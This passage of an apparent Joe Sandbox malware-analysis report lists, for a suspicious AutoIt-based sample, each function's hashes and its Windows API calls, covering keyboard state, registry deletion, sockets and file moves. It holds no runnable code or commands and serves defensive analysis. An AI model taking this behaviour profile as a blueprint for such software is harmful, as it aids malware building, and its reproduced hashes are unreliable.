                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: be61154f457d7b31f4b43f4b78a3d816a85f8faba7318374b44edbf6b85403d0
                                                            • Instruction ID: 708c2f26f7f6246ff1a7de6d27d6ad2b8f64f0ba3b37eaf177df09cacb276d3d
                                                            • Opcode Fuzzy Hash: be61154f457d7b31f4b43f4b78a3d816a85f8faba7318374b44edbf6b85403d0
                                                            • Instruction Fuzzy Hash: 1F619275A00619DFCF14DF54C8819AEBBF5FF49310F14806AE959AB361CB30AD41DBA0
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00D30F8C
                                                            • GetKeyboardState.USER32(?), ref: 00D30FA1
                                                            • SetKeyboardState.USER32(?), ref: 00D31002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D31030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D3104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D31095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D310B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: e19c196006de46151b0b2e6c3e7a1c5b10dc58a736bbaee63c3bc754603a3448
                                                            • Instruction ID: 01d399d6d82c16f0ded86c54e96aad50d41587810880100aac0a98d1ae196bb4
                                                            • Opcode Fuzzy Hash: e19c196006de46151b0b2e6c3e7a1c5b10dc58a736bbaee63c3bc754603a3448
                                                            • Instruction Fuzzy Hash: C251C0A46047D63DFB3642348C56BBABFA95B06304F0C8989E1D58A8D2C2D9ECD8D771
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 00D30DA5
                                                            • GetKeyboardState.USER32(?), ref: 00D30DBA
                                                            • SetKeyboardState.USER32(?), ref: 00D30E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D30E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D30E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D30EA8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D30EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: d2bfd599ad53c349712ecea5ba9484bb8ea821bdaf05c4c03fd3ed285a9c5928
                                                            • Instruction ID: f659219ab3189e5ddcc138cc5701308e2b19d559a41caf1c40265477f6cc9e22
                                                            • Opcode Fuzzy Hash: d2bfd599ad53c349712ecea5ba9484bb8ea821bdaf05c4c03fd3ed285a9c5928
                                                            • Instruction Fuzzy Hash: EE51A3A16447D53DFB3687648C65B7ABFA99F06300F0C8889F1D49A8C2D395AC98D770
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 881d19a8b05a9e46fbcbbdeec0c686cc015470a5cccd0524d928446f15444726
                                                            • Instruction ID: 931cd0c9b7e20d53b312342136b2e62c452b34ed774fd4470f2be8a7f43e032e
                                                            • Opcode Fuzzy Hash: 881d19a8b05a9e46fbcbbdeec0c686cc015470a5cccd0524d928446f15444726
                                                            • Instruction Fuzzy Hash: 6041A465C1161876CB51EBF49C4A9EFB3BCAF04310F508956EA09E3221EB34E245D7AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @U=u
                                                            • API String ID: 0-2594219639
                                                            • Opcode ID: 5d4dcf8a88c84218906841dfb95397897a8337addf8f59fc327cf2c940594bdd
                                                            • Instruction ID: acc83de49d43c55a810a09ab4a79fb366bc69039bc6a48e128a72d35951011b6
                                                            • Opcode Fuzzy Hash: 5d4dcf8a88c84218906841dfb95397897a8337addf8f59fc327cf2c940594bdd
                                                            • Instruction Fuzzy Hash: 3B419135904724AFDB109F2CDC48FA9BBA4AB09352F180265FD55EB2E1CB309D49DA71
                                                            APIs
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D33697,?), ref: 00D3468B
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D33697,?), ref: 00D346A4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00D336B7
                                                            • _wcscmp.LIBCMT ref: 00D336D3
                                                            • MoveFileW.KERNEL32(?,?), ref: 00D336EB
                                                            • _wcscat.LIBCMT ref: 00D33733
                                                            • SHFileOperationW.SHELL32(?), ref: 00D3379F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
• Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D572AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D57351
                                                            • IsMenu.USER32(?), ref: 00D57369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D573B1
                                                            • DrawMenuBar.USER32 ref: 00D573C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00D50FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D50FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00D510B5
                                                              • Part of subcall function 00D50FA5: RegCloseKey.ADVAPI32(?), ref: 00D5101B
                                                              • Part of subcall function 00D50FA5: FreeLibrary.KERNEL32(?), ref: 00D5106D
                                                              • Part of subcall function 00D50FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00D51090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D51058
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DB2E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DB54
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00D2DB57
                                                            • SysAllocString.OLEAUT32(?), ref: 00D2DB75
                                                            • SysFreeString.OLEAUT32(?), ref: 00D2DB7E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D2DBA3
                                                            • SysAllocString.OLEAUT32(?), ref: 00D2DBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            APIs
                                                              • Part of subcall function 00D47D8B: inet_addr.WSOCK32(00000000), ref: 00D47DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00D461C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D461D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D4620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00D46217
                                                            • WSAGetLastError.WSOCK32 ref: 00D46221
                                                            • closesocket.WSOCK32(00000000), ref: 00D4624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D46263
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D28F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D28F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D28F57
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 365058703-2258501812
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DC09
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DC2F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00D2DC32
                                                            • SysAllocString.OLEAUT32 ref: 00D2DC53
                                                            • SysFreeString.OLEAUT32 ref: 00D2DC5C
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D2DC76
                                                            • SysAllocString.OLEAUT32(?), ref: 00D2DC84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00D2B204
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D2B221
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D2B259
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D2B27F
                                                            • _wcsstr.LIBCMT ref: 00D2B289
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID: @U=u
                                                            • API String ID: 3902887630-2594219639
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D29320
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D29352
                                                            • __itow.LIBCMT ref: 00D2936A
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D29392
                                                            • __itow.LIBCMT ref: 00D293A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID: @U=u
                                                            • API String ID: 2983881199-2594219639
                                                            APIs
                                                              • Part of subcall function 00CD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CD1D73
                                                              • Part of subcall function 00CD1D35: GetStockObject.GDI32(00000011), ref: 00CD1D87
                                                              • Part of subcall function 00CD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD1D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D57632
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D5763F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D5764A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D57659
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D57665
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: dfcea7df9dbc7c9084797603e08c8223c24a3864036d3a0698982bfd11e21183
                                                            • Instruction ID: d19b6bed0a5fa047fb664c27f043df92d0efafcfcea9f988cfa589fbd77f0032
                                                            • Opcode Fuzzy Hash: dfcea7df9dbc7c9084797603e08c8223c24a3864036d3a0698982bfd11e21183
                                                            • Instruction Fuzzy Hash: E711D0B2100219BFEF118F64CC85EE77F6DEF083A8F114115BA04A20A0CA72AC21DBB0
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 00CF9AE6
                                                              • Part of subcall function 00CF3187: EncodePointer.KERNEL32(00000000), ref: 00CF318A
                                                              • Part of subcall function 00CF3187: __initp_misc_winsig.LIBCMT ref: 00CF31A5
                                                              • Part of subcall function 00CF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CF9EA0
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CF9EB4
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CF9EC7
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CF9EDA
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CF9EED
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CF9F00
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00CF9F13
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CF9F26
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00CF9F39
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CF9F4C
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CF9F5F
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CF9F72
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CF9F85
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CF9F98
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CF9FAB
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CF9FBE
                                                            • __mtinitlocks.LIBCMT ref: 00CF9AEB
                                                            • __mtterm.LIBCMT ref: 00CF9AF4
                                                              • Part of subcall function 00CF9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00CF9AF9,00CF7CD0,00D8A0B8,00000014), ref: 00CF9C56
                                                              • Part of subcall function 00CF9B5C: _free.LIBCMT ref: 00CF9C5D
                                                              • Part of subcall function 00CF9B5C: DeleteCriticalSection.KERNEL32(00D8EC00,?,?,00CF9AF9,00CF7CD0,00D8A0B8,00000014), ref: 00CF9C7F
                                                            • __calloc_crt.LIBCMT ref: 00CF9B19
                                                            • __initptd.LIBCMT ref: 00CF9B3B
                                                            • GetCurrentThreadId.KERNEL32 ref: 00CF9B42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 3567560977-0
                                                            • Opcode ID: e7125208b90b6dd9cc87aff9ef0520df5112bd3ce5c042012e1c57a196bd06a9
                                                            • Instruction ID: f40616249d5e33cde2b963a4e07212e5959aa8496dfd5a6f5d499ae67ec78506
                                                            • Opcode Fuzzy Hash: e7125208b90b6dd9cc87aff9ef0520df5112bd3ce5c042012e1c57a196bd06a9
                                                            • Instruction Fuzzy Hash: 8DF0CD325197192AEEF47774BC07BBA2780DB02334F200A2AF720C61D6EF70850026A2
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CF3F85), ref: 00CF4085
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00CF408C
                                                            • EncodePointer.KERNEL32(00000000), ref: 00CF4097
                                                            • DecodePointer.KERNEL32(00CF3F85), ref: 00CF40B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 5c19429edd79377af54f08e7f1854702e85ff1f294bb839e7b7c69a57c116c01
                                                            • Instruction ID: c0cfe99588e219111daee0425f65c00cf955fce3b465d68231775c4a0ef04205
                                                            • Opcode Fuzzy Hash: 5c19429edd79377af54f08e7f1854702e85ff1f294bb839e7b7c69a57c116c01
                                                            • Instruction Fuzzy Hash: 34E0B670581700EFEB64AF61EC0DB163AA4B704783F104026FA55E92B0CFB64604CF79
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 448254e0949c07d16a0f673e8df4957746ed55f0cae072f6d9ea880876eb2e4a
                                                            • Instruction ID: 825355247edb79694e64df78818cf2985efde9d178ead6b1aab7709198d468a4
                                                            • Opcode Fuzzy Hash: 448254e0949c07d16a0f673e8df4957746ed55f0cae072f6d9ea880876eb2e4a
                                                            • Instruction Fuzzy Hash: FC61AE3590025AABCF01EF60CC82EFE37A5EF05708F048569FA595B292DB34EC05EB61
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D502BD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D502FD
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00D50320
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D50349
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D5038C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D50399
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 2d57aa3c1abe46341f98a93fa9fb4de469c2d82e75414563d4e337f371f222b2
                                                            • Instruction ID: 0b85ddcfff3e6eb7a1212089cf49940048fea8061226c34deb5cc3c4c22d2c56
                                                            • Opcode Fuzzy Hash: 2d57aa3c1abe46341f98a93fa9fb4de469c2d82e75414563d4e337f371f222b2
                                                            • Instruction Fuzzy Hash: FF514A31108304AFDB14EF64C885E6EBBE9FF84315F04491DF9958B2A2DB31E909DB62
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00D557FB
                                                            • GetMenuItemCount.USER32(00000000), ref: 00D55832
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D5585A
                                                            • GetMenuItemID.USER32(?,?), ref: 00D558C9
                                                            • GetSubMenu.USER32(?,?), ref: 00D558D7
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00D55928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
